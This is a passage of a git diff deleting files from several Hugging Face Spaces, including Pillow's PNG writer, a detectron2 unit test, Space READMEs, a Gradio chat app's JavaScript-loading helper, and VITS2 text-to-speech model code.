frame_data["bbox"] - im_frame = im_frame.crop(bbox) - size = im_frame.size - encoderinfo = frame_data["encoderinfo"] - frame_duration = int(round(encoderinfo["duration"])) - frame_disposal = encoderinfo.get("disposal", disposal) - frame_blend = encoderinfo.get("blend", blend) - # frame control - chunk( - fp, - b"fcTL", - o32(seq_num), # sequence_number - o32(size[0]), # width - o32(size[1]), # height - o32(bbox[0]), # x_offset - o32(bbox[1]), # y_offset - o16(frame_duration), # delay_numerator - o16(1000), # delay_denominator - o8(frame_disposal), # dispose_op - o8(frame_blend), # blend_op - ) - seq_num += 1 - # frame data - if frame == 0 and not default_image: - # first frame must be in IDAT chunks for backwards compatibility - ImageFile._save( - im_frame, - _idat(fp, chunk), - [("zip", (0, 0) + im_frame.size, 0, rawmode)], - ) - else: - fdat_chunks = _fdat(fp, chunk, seq_num) - ImageFile._save( - im_frame, - fdat_chunks, - [("zip", (0, 0) + im_frame.size, 0, rawmode)], - ) - seq_num = fdat_chunks.seq_num - - -def _save_all(im, fp, filename): - _save(im, fp, filename, save_all=True) - - -def _save(im, fp, filename, chunk=putchunk, save_all=False): - # save an image to disk (called by the save method) - - if save_all: - default_image = im.encoderinfo.get( - "default_image", im.info.get("default_image") - ) - modes = set() - append_images = im.encoderinfo.get("append_images", []) - if default_image: - chain = itertools.chain(append_images) - else: - chain = itertools.chain([im], append_images) - for im_seq in chain: - for im_frame in ImageSequence.Iterator(im_seq): - modes.add(im_frame.mode) - for mode in ("RGBA", "RGB", "P"): - if mode in modes: - break - else: - mode = modes.pop() - else: - mode = im.mode - - if mode == "P": - # - # attempt to minimize storage requirements for palette images - if "bits" in im.encoderinfo: - # number of bits specified by user - colors = min(1 << im.encoderinfo["bits"], 256) - else: - # check palette contents - if im.palette: - colors = max(min(len(im.palette.getdata()[1]) // 3, 256), 1) - else: - colors = 256 - - if colors <= 16: - if colors <= 2: - bits = 1 - elif colors <= 4: - bits = 2 - else: - bits = 4 - mode = f"{mode};{bits}" - - # encoder options - im.encoderconfig = ( - im.encoderinfo.get("optimize", False), - im.encoderinfo.get("compress_level", -1), - im.encoderinfo.get("compress_type", -1), - im.encoderinfo.get("dictionary", b""), - ) - - # get the corresponding PNG mode - try: - rawmode, mode = _OUTMODES[mode] - except KeyError as e: - msg = f"cannot write mode {mode} as PNG" - raise OSError(msg) from e - - # - # write minimal PNG file - - fp.write(_MAGIC) - - chunk( - fp, - b"IHDR", - o32(im.size[0]), # 0: size - o32(im.size[1]), - mode, # 8: depth/type - b"\0", # 10: compression - b"\0", # 11: filter category - b"\0", # 12: interlace flag - ) - - chunks = [b"cHRM", b"gAMA", b"sBIT", b"sRGB", b"tIME"] - - icc = im.encoderinfo.get("icc_profile", im.info.get("icc_profile")) - if icc: - # ICC profile - # according to PNG spec, the iCCP chunk contains: - # Profile name 1-79 bytes (character string) - # Null separator 1 byte (null character) - # Compression method 1 byte (0) - # Compressed profile n bytes (zlib with deflate compression) - name = b"ICC Profile" - data = name + b"\0\0" + zlib.compress(icc) - chunk(fp, b"iCCP", data) - - # You must either have sRGB or iCCP. - # Disallow sRGB chunks when an iCCP-chunk has been emitted. - chunks.remove(b"sRGB") - - info = im.encoderinfo.get("pnginfo") - if info: - chunks_multiple_allowed = [b"sPLT", b"iTXt", b"tEXt", b"zTXt"] - for info_chunk in info.chunks: - cid, data = info_chunk[:2] - if cid in chunks: - chunks.remove(cid) - chunk(fp, cid, data) - elif cid in chunks_multiple_allowed: - chunk(fp, cid, data) - elif cid[1:2].islower(): - # Private chunk - after_idat = info_chunk[2:3] - if not after_idat: - chunk(fp, cid, data) - - if im.mode == "P": - palette_byte_number = colors * 3 - palette_bytes = im.im.getpalette("RGB")[:palette_byte_number] - while len(palette_bytes) < palette_byte_number: - palette_bytes += b"\0" - chunk(fp, b"PLTE", palette_bytes) - - transparency = im.encoderinfo.get("transparency", im.info.get("transparency", None)) - - if transparency or transparency == 0: - if im.mode == "P": - # limit to actual palette size - alpha_bytes = colors - if isinstance(transparency, bytes): - chunk(fp, b"tRNS", transparency[:alpha_bytes]) - else: - transparency = max(0, min(255, transparency)) - alpha = b"\xFF" * transparency + b"\0" - chunk(fp, b"tRNS", alpha[:alpha_bytes]) - elif im.mode in ("1", "L", "I"): - transparency = max(0, min(65535, transparency)) - chunk(fp, b"tRNS", o16(transparency)) - elif im.mode == "RGB": - red, green, blue = transparency - chunk(fp, b"tRNS", o16(red) + o16(green) + o16(blue)) - else: - if "transparency" in im.encoderinfo: - # don't bother with transparency if it's an RGBA - # and it's in the info dict. It's probably just stale. - msg = "cannot use transparency for this mode" - raise OSError(msg) - else: - if im.mode == "P" and im.im.getpalettemode() == "RGBA": - alpha = im.im.getpalette("RGBA", "A") - alpha_bytes = colors - chunk(fp, b"tRNS", alpha[:alpha_bytes]) - - dpi = im.encoderinfo.get("dpi") - if dpi: - chunk( - fp, - b"pHYs", - o32(int(dpi[0] / 0.0254 + 0.5)), - o32(int(dpi[1] / 0.0254 + 0.5)), - b"\x01", - ) - - if info: - chunks = [b"bKGD", b"hIST"] - for info_chunk in info.chunks: - cid, data = info_chunk[:2] - if cid in chunks: - chunks.remove(cid) - chunk(fp, cid, data) - - exif = im.encoderinfo.get("exif") - if exif: - if isinstance(exif, Image.Exif): - exif = exif.tobytes(8) - if exif.startswith(b"Exif\x00\x00"): - exif = exif[6:] - chunk(fp, b"eXIf", exif) - - if save_all: - _write_multiple_frames(im, fp, chunk, rawmode, default_image, append_images) - else: - ImageFile._save(im, _idat(fp, chunk), [("zip", (0, 0) + im.size, 0, rawmode)]) - - if info: - for info_chunk in info.chunks: - cid, data = info_chunk[:2] - if cid[1:2].islower(): - # Private chunk - after_idat = info_chunk[2:3] - if after_idat: - chunk(fp, cid, data) - - chunk(fp, b"IEND", b"") - - if hasattr(fp, "flush"): - fp.flush() - - -# -------------------------------------------------------------------- -# PNG chunk converter - - -def getchunks(im, **params): - """Return a list of PNG chunks representing this image.""" - - class collector: - data = [] - - def write(self, data): - pass - - def append(self, chunk): - self.data.append(chunk) - - def append(fp, cid, *data): - data = b"".join(data) - crc = o32(_crc32(data, _crc32(cid))) - fp.append((cid, data, crc)) - - fp = collector() - - try: - im.encoderinfo = params - _save(im, fp, None, append) - finally: - del im.encoderinfo - - return fp.data - - -# -------------------------------------------------------------------- -# Registry - -Image.register_open(PngImageFile.format, PngImageFile, _accept) -Image.register_save(PngImageFile.format, _save) -Image.register_save_all(PngImageFile.format, _save_all) - -Image.register_extensions(PngImageFile.format, [".png", ".apng"]) - -Image.register_mime(PngImageFile.format, "image/png") diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/tests/modeling/test_box2box_transform.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/tests/modeling/test_box2box_transform.py deleted file mode 100644 index fd3a7b79b6b7a3608ad7cb3918de020a5a600d2f..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/tests/modeling/test_box2box_transform.py +++ /dev/null @@ -1,94 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import logging -import unittest -import torch - -from detectron2.modeling.box_regression import ( - Box2BoxTransform, - Box2BoxTransformLinear, - Box2BoxTransformRotated, -) -from detectron2.utils.testing import random_boxes - -logger = logging.getLogger(__name__) - - -class TestBox2BoxTransform(unittest.TestCase): - def test_reconstruction(self): - weights = (5, 5, 10, 10) - b2b_tfm = Box2BoxTransform(weights=weights) - src_boxes = random_boxes(10) - dst_boxes = random_boxes(10) - - devices = [torch.device("cpu")] - if torch.cuda.is_available(): - devices.append(torch.device("cuda")) - for device in devices: - src_boxes = src_boxes.to(device=device) - dst_boxes = dst_boxes.to(device=device) - deltas = b2b_tfm.get_deltas(src_boxes, dst_boxes) - dst_boxes_reconstructed = b2b_tfm.apply_deltas(deltas, src_boxes) - self.assertTrue(torch.allclose(dst_boxes, dst_boxes_reconstructed)) - - def test_apply_deltas_tracing(self): - weights = (5, 5, 10, 10) - b2b_tfm = Box2BoxTransform(weights=weights) - - with torch.no_grad(): - func = torch.jit.trace(b2b_tfm.apply_deltas, (torch.randn(10, 20), torch.randn(10, 4))) - - o = func(torch.randn(10, 20), torch.randn(10, 4)) - self.assertEqual(o.shape, (10, 20)) - o = func(torch.randn(5, 20), torch.randn(5, 4)) - self.assertEqual(o.shape, (5, 20)) - - -def random_rotated_boxes(mean_box, std_length, std_angle, N): - return torch.cat( - [torch.rand(N, 4) * std_length, torch.rand(N, 1) * std_angle], dim=1 - ) + torch.tensor(mean_box, dtype=torch.float) - - -class TestBox2BoxTransformRotated(unittest.TestCase): - def test_reconstruction(self): - weights = (5, 5, 10, 10, 1) - b2b_transform = Box2BoxTransformRotated(weights=weights) - src_boxes = random_rotated_boxes([10, 10, 20, 20, -30], 5, 60.0, 10) - dst_boxes = random_rotated_boxes([10, 10, 20, 20, -30], 5, 60.0, 10) - - devices = [torch.device("cpu")] - if torch.cuda.is_available(): - devices.append(torch.device("cuda")) - for device in devices: - src_boxes = src_boxes.to(device=device) - dst_boxes = dst_boxes.to(device=device) - deltas = b2b_transform.get_deltas(src_boxes, dst_boxes) - dst_boxes_reconstructed = b2b_transform.apply_deltas(deltas, src_boxes) - assert torch.allclose(dst_boxes[:, :4], dst_boxes_reconstructed[:, :4], atol=1e-5) - # angle difference has to be normalized - assert torch.allclose( - (dst_boxes[:, 4] - dst_boxes_reconstructed[:, 4] + 180.0) % 360.0 - 180.0, - torch.zeros_like(dst_boxes[:, 4]), - atol=1e-4, - ) - - -class TestBox2BoxTransformLinear(unittest.TestCase): - def test_reconstruction(self): - b2b_tfm = Box2BoxTransformLinear() - src_boxes = random_boxes(10) - dst_boxes = torch.tensor([0, 0, 101, 101] * 10).reshape(10, 4).float() - - devices = [torch.device("cpu")] - if torch.cuda.is_available(): - devices.append(torch.device("cuda")) - for device in devices: - src_boxes = src_boxes.to(device=device) - dst_boxes = dst_boxes.to(device=device) - deltas = b2b_tfm.get_deltas(src_boxes, dst_boxes) - dst_boxes_reconstructed = b2b_tfm.apply_deltas(deltas, src_boxes) - self.assertTrue(torch.allclose(dst_boxes, dst_boxes_reconstructed, atol=1e-3)) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/cchuang2009/CO2/README.md b/spaces/cchuang2009/CO2/README.md deleted file mode 100644 index eca6fcbb60ca262d56b2230201e657c11954b8c5..0000000000000000000000000000000000000000 --- a/spaces/cchuang2009/CO2/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: CO2 -emoji: ⚡ -colorFrom: gray -colorTo: blue -sdk: streamlit -sdk_version: 1.19.0 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/chcomet/cholec80-position-encoder/README.md b/spaces/chcomet/cholec80-position-encoder/README.md deleted file mode 100644 index c15703ad4c641d3f37a94db4e521b651b22728cb..0000000000000000000000000000000000000000 --- a/spaces/chcomet/cholec80-position-encoder/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Cholec80 Position Encoder -emoji: 🌍 -colorFrom: blue -colorTo: red -sdk: gradio -sdk_version: 3.3.1 -app_file: app.py -pinned: false -license: afl-3.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/chenxx/ChuanhuChatGPT/overwrites.py b/spaces/chenxx/ChuanhuChatGPT/overwrites.py deleted file mode 100644 index a87499a81bb3c23bf34c1faadcc02085567cd447..0000000000000000000000000000000000000000 --- a/spaces/chenxx/ChuanhuChatGPT/overwrites.py +++ /dev/null @@ -1,55 +0,0 @@ -from __future__ import annotations -import logging - -from llama_index import Prompt -from typing import List, Tuple -import mdtex2html - -from presets import * -from llama_func import * - - -def compact_text_chunks(self, prompt: Prompt, text_chunks: List[str]) -> List[str]: - logging.debug("Compacting text chunks...🚀🚀🚀") - combined_str = [c.strip() for c in text_chunks if c.strip()] - combined_str = [f"[{index+1}] {c}" for index, c in enumerate(combined_str)] - combined_str = "\n\n".join(combined_str) - # resplit based on self.max_chunk_overlap - text_splitter = self.get_text_splitter_given_prompt(prompt, 1, padding=1) - return text_splitter.split_text(combined_str) - - -def postprocess( - self, y: List[Tuple[str | None, str | None]] -) -> List[Tuple[str | None, str | None]]: - """ - Parameters: - y: List of tuples representing the message and response pairs. Each message and response should be a string, which may be in Markdown format. - Returns: - List of tuples representing the message and response. Each message and response will be a string of HTML. - """ - if y is None or y == []: - return [] - tag_regex = re.compile(r"^<\w+>[^<]+") - if tag_regex.search(y[-1][1]): - y[-1] = (convert_user(y[-1][0]), y[-1][1]) - else: - y[-1] = (convert_user(y[-1][0]), convert_mdtext(y[-1][1])) - return y - -with open("./assets/custom.js", "r", encoding="utf-8") as f, open("./assets/Kelpy-Codos.js", "r", encoding="utf-8") as f2: - customJS = f.read() - kelpyCodos = f2.read() - -def reload_javascript(): - print("Reloading javascript...") - js = f'' - def template_response(*args, **kwargs): - res = GradioTemplateResponseOriginal(*args, **kwargs) - res.body = res.body.replace(b'', f'{js}'.encode("utf8")) - res.init_headers() - return res - - gr.routes.templates.TemplateResponse = template_response - -GradioTemplateResponseOriginal = gr.routes.templates.TemplateResponse \ No newline at end of file diff --git a/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/modules.py b/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/modules.py deleted file mode 100644 index b1f89a2f837f190a3dd5de52e7a4e183f1024306..0000000000000000000000000000000000000000 --- a/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/modules.py +++ /dev/null @@ -1,597 +0,0 @@ -import math -import torch -from torch import nn -from torch.nn import functional as F - -from torch.nn import Conv1d -from torch.nn.utils import weight_norm, remove_weight_norm - -import commons -from commons import init_weights, get_padding -from transforms import piecewise_rational_quadratic_transform -from attentions import Encoder - -LRELU_SLOPE = 0.1 - - -class LayerNorm(nn.Module): - def __init__(self, channels, eps=1e-5): - super().__init__() - self.channels = channels - self.eps = eps - - self.gamma = nn.Parameter(torch.ones(channels)) - self.beta = nn.Parameter(torch.zeros(channels)) - - def forward(self, x): - x = x.transpose(1, -1) - x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps) - return x.transpose(1, -1) - - -class ConvReluNorm(nn.Module): - def __init__( - self, - in_channels, - hidden_channels, - out_channels, - kernel_size, - n_layers, - p_dropout, - ): - super().__init__() - self.in_channels = in_channels - self.hidden_channels = hidden_channels - self.out_channels = out_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - assert n_layers > 1, "Number of layers should be larger than 0." - - self.conv_layers = nn.ModuleList() - self.norm_layers = nn.ModuleList() - self.conv_layers.append( - nn.Conv1d( - in_channels, hidden_channels, kernel_size, padding=kernel_size // 2 - ) - ) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.relu_drop = nn.Sequential(nn.ReLU(), nn.Dropout(p_dropout)) - for _ in range(n_layers - 1): - self.conv_layers.append( - nn.Conv1d( - hidden_channels, - hidden_channels, - kernel_size, - padding=kernel_size // 2, - ) - ) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask): - x_org = x - for i in range(self.n_layers): - x = self.conv_layers[i](x * x_mask) - x = self.norm_layers[i](x) - x = self.relu_drop(x) - x = x_org + self.proj(x) - return x * x_mask - - -class DDSConv(nn.Module): - """ - Dialted and Depth-Separable Convolution - """ - - def __init__(self, channels, kernel_size, n_layers, p_dropout=0.0): - super().__init__() - self.channels = channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - - self.drop = nn.Dropout(p_dropout) - self.convs_sep = nn.ModuleList() - self.convs_1x1 = nn.ModuleList() - self.norms_1 = nn.ModuleList() - self.norms_2 = nn.ModuleList() - for i in range(n_layers): - dilation = kernel_size**i - padding = (kernel_size * dilation - dilation) // 2 - self.convs_sep.append( - nn.Conv1d( - channels, - channels, - kernel_size, - groups=channels, - dilation=dilation, - padding=padding, - ) - ) - self.convs_1x1.append(nn.Conv1d(channels, channels, 1)) - self.norms_1.append(LayerNorm(channels)) - self.norms_2.append(LayerNorm(channels)) - - def forward(self, x, x_mask, g=None): - if g is not None: - x = x + g - for i in range(self.n_layers): - y = self.convs_sep[i](x * x_mask) - y = self.norms_1[i](y) - y = F.gelu(y) - y = self.convs_1x1[i](y) - y = self.norms_2[i](y) - y = F.gelu(y) - y = self.drop(y) - x = x + y - return x * x_mask - - -class WN(torch.nn.Module): - def __init__( - self, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - p_dropout=0, - ): - super(WN, self).__init__() - assert kernel_size % 2 == 1 - self.hidden_channels = hidden_channels - self.kernel_size = (kernel_size,) - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.p_dropout = p_dropout - - self.in_layers = torch.nn.ModuleList() - self.res_skip_layers = torch.nn.ModuleList() - self.drop = nn.Dropout(p_dropout) - - if gin_channels != 0: - cond_layer = torch.nn.Conv1d( - gin_channels, 2 * hidden_channels * n_layers, 1 - ) - self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight") - - for i in range(n_layers): - dilation = dilation_rate**i - padding = int((kernel_size * dilation - dilation) / 2) - in_layer = torch.nn.Conv1d( - hidden_channels, - 2 * hidden_channels, - kernel_size, - dilation=dilation, - padding=padding, - ) - in_layer = torch.nn.utils.weight_norm(in_layer, name="weight") - self.in_layers.append(in_layer) - - # last one is not necessary - if i < n_layers - 1: - res_skip_channels = 2 * hidden_channels - else: - res_skip_channels = hidden_channels - - res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1) - res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight") - self.res_skip_layers.append(res_skip_layer) - - def forward(self, x, x_mask, g=None, **kwargs): - output = torch.zeros_like(x) - n_channels_tensor = torch.IntTensor([self.hidden_channels]) - - if g is not None: - g = self.cond_layer(g) - - for i in range(self.n_layers): - x_in = self.in_layers[i](x) - if g is not None: - cond_offset = i * 2 * self.hidden_channels - g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :] - else: - g_l = torch.zeros_like(x_in) - - acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor) - acts = self.drop(acts) - - res_skip_acts = self.res_skip_layers[i](acts) - if i < self.n_layers - 1: - res_acts = res_skip_acts[:, : self.hidden_channels, :] - x = (x + res_acts) * x_mask - output = output + res_skip_acts[:, self.hidden_channels :, :] - else: - output = output + res_skip_acts - return output * x_mask - - def remove_weight_norm(self): - if self.gin_channels != 0: - torch.nn.utils.remove_weight_norm(self.cond_layer) - for l in self.in_layers: - torch.nn.utils.remove_weight_norm(l) - for l in self.res_skip_layers: - torch.nn.utils.remove_weight_norm(l) - - -class ResBlock1(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.convs1 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]), - ) - ), - ] - ) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - ] - ) - self.convs2.apply(init_weights) - - def forward(self, x, x_mask=None): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c2(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.convs = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - ] - ) - self.convs.apply(init_weights) - - def forward(self, x, x_mask=None): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Log(nn.Module): - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = torch.log(torch.clamp_min(x, 1e-5)) * x_mask - logdet = torch.sum(-y, [1, 2]) - return y, logdet - else: - x = torch.exp(x) * x_mask - return x - - -class Flip(nn.Module): - def forward(self, x, *args, reverse=False, **kwargs): - x = torch.flip(x, [1]) - if not reverse: - logdet = torch.zeros(x.size(0)).to(dtype=x.dtype, device=x.device) - return x, logdet - else: - return x - - -class ElementwiseAffine(nn.Module): - def __init__(self, channels): - super().__init__() - self.channels = channels - self.m = nn.Parameter(torch.zeros(channels, 1)) - self.logs = nn.Parameter(torch.zeros(channels, 1)) - - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = self.m + torch.exp(self.logs) * x - y = y * x_mask - logdet = torch.sum(self.logs * x_mask, [1, 2]) - return y, logdet - else: - x = (x - self.m) * torch.exp(-self.logs) * x_mask - return x - - -class ResidualCouplingLayer(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=0, - gin_channels=0, - mean_only=False, - ): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=p_dropout, - gin_channels=gin_channels, - ) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels] * 2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels] * 2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1, 2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x - - -class ConvFlow(nn.Module): - def __init__( - self, - in_channels, - filter_channels, - kernel_size, - n_layers, - num_bins=10, - tail_bound=5.0, - ): - super().__init__() - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.num_bins = num_bins - self.tail_bound = tail_bound - self.half_channels = in_channels // 2 - - self.pre = nn.Conv1d(self.half_channels, filter_channels, 1) - self.convs = DDSConv(filter_channels, kernel_size, n_layers, p_dropout=0.0) - self.proj = nn.Conv1d( - filter_channels, self.half_channels * (num_bins * 3 - 1), 1 - ) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels] * 2, 1) - h = self.pre(x0) - h = self.convs(h, x_mask, g=g) - h = self.proj(h) * x_mask - - b, c, t = x0.shape - h = h.reshape(b, c, -1, t).permute(0, 1, 3, 2) # [b, cx?, t] -> [b, c, t, ?] - - unnormalized_widths = h[..., : self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_heights = h[..., self.num_bins : 2 * self.num_bins] / math.sqrt( - self.filter_channels - ) - unnormalized_derivatives = h[..., 2 * self.num_bins :] - - x1, logabsdet = piecewise_rational_quadratic_transform( - x1, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=reverse, - tails="linear", - tail_bound=self.tail_bound, - ) - - x = torch.cat([x0, x1], 1) * x_mask - logdet = torch.sum(logabsdet * x_mask, [1, 2]) - if not reverse: - return x, logdet - else: - return x - - -class TransformerCouplingLayer(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - n_layers, - n_heads, - p_dropout=0, - filter_channels=0, - mean_only=False, - wn_sharing_parameter=None, - gin_channels=0, - ): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = ( - Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - isflow=True, - gin_channels=gin_channels, - ) - if wn_sharing_parameter is None - else wn_sharing_parameter - ) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels] * 2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels] * 2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1, 2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x - - x1, logabsdet = piecewise_rational_quadratic_transform( - x1, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=reverse, - tails="linear", - tail_bound=self.tail_bound, - ) - - x = torch.cat([x0, x1], 1) * x_mask - logdet = torch.sum(logabsdet * x_mask, [1, 2]) - if not reverse: - return x, logdet - else: - return x diff --git a/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/text/symbols.py b/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/text/symbols.py deleted file mode 100644 index 161ae9f71275856a168cca1b8963a2aee875bb78..0000000000000000000000000000000000000000 --- a/spaces/chikoto/Umamusume-DeBERTa-VITS2-TTS-JP/text/symbols.py +++ /dev/null @@ -1,187 +0,0 @@ -punctuation = ["!", "?", "…", ",", ".", "'", "-"] -pu_symbols = punctuation + ["SP", "UNK"] -pad = "_" - -# chinese -zh_symbols = [ - "E", - "En", - "a", - "ai", - "an", - "ang", - "ao", - "b", - "c", - "ch", - "d", - "e", - "ei", - "en", - "eng", - "er", - "f", - "g", - "h", - "i", - "i0", - "ia", - "ian", - "iang", - "iao", - "ie", - "in", - "ing", - "iong", - "ir", - "iu", - "j", - "k", - "l", - "m", - "n", - "o", - "ong", - "ou", - "p", - "q", - "r", - "s", - "sh", - "t", - "u", - "ua", - "uai", - "uan", - "uang", - "ui", - "un", - "uo", - "v", - "van", - "ve", - "vn", - "w", - "x", - "y", - "z", - "zh", - "AA", - "EE", - "OO", -] -num_zh_tones = 6 - -# japanese -ja_symbols = [ - "N", - "a", - "a:", - "b", - "by", - "ch", - "d", - "dy", - "e", - "e:", - "f", - "g", - "gy", - "h", - "hy", - "i", - "i:", - "j", - "k", - "ky", - "m", - "my", - "n", - "ny", - "o", - "o:", - "p", - "py", - "q", - "r", - "ry", - "s", - "sh", - "t", - "ts", - "ty", - "u", - "u:", - "w", - "y", - "z", - "zy", -] -num_ja_tones = 1 - -# English -en_symbols = [ - "aa", - "ae", - "ah", - "ao", - "aw", - "ay", - "b", - "ch", - "d", - "dh", - "eh", - "er", - "ey", - "f", - "g", - "hh", - "ih", - "iy", - "jh", - "k", - "l", - "m", - "n", - "ng", - "ow", - "oy", - "p", - "r", - "s", - "sh", - "t", - "th", - "uh", - "uw", - "V", - "w", - "y", - "z", - "zh", -] -num_en_tones = 4 - -# combine all symbols -normal_symbols = sorted(set(zh_symbols + ja_symbols + en_symbols)) -symbols = [pad] + normal_symbols + pu_symbols -sil_phonemes_ids = [symbols.index(i) for i in pu_symbols] - -# combine all tones -num_tones = num_zh_tones + num_ja_tones + num_en_tones - -# language maps -language_id_map = {"ZH": 0, "JP": 1, "EN": 2} -num_languages = len(language_id_map.keys()) - -language_tone_start_map = { - "ZH": 0, - "JP": num_zh_tones, - "EN": num_zh_tones + num_ja_tones, -} - -if __name__ == "__main__": - a = set(zh_symbols) - b = set(en_symbols) - print(sorted(a & b)) diff --git a/spaces/chilge/Fushimi/models.py b/spaces/chilge/Fushimi/models.py deleted file mode 100644 index bdbce8445304abda792f235a4761b831fd6f4d12..0000000000000000000000000000000000000000 --- a/spaces/chilge/Fushimi/models.py +++ /dev/null @@ 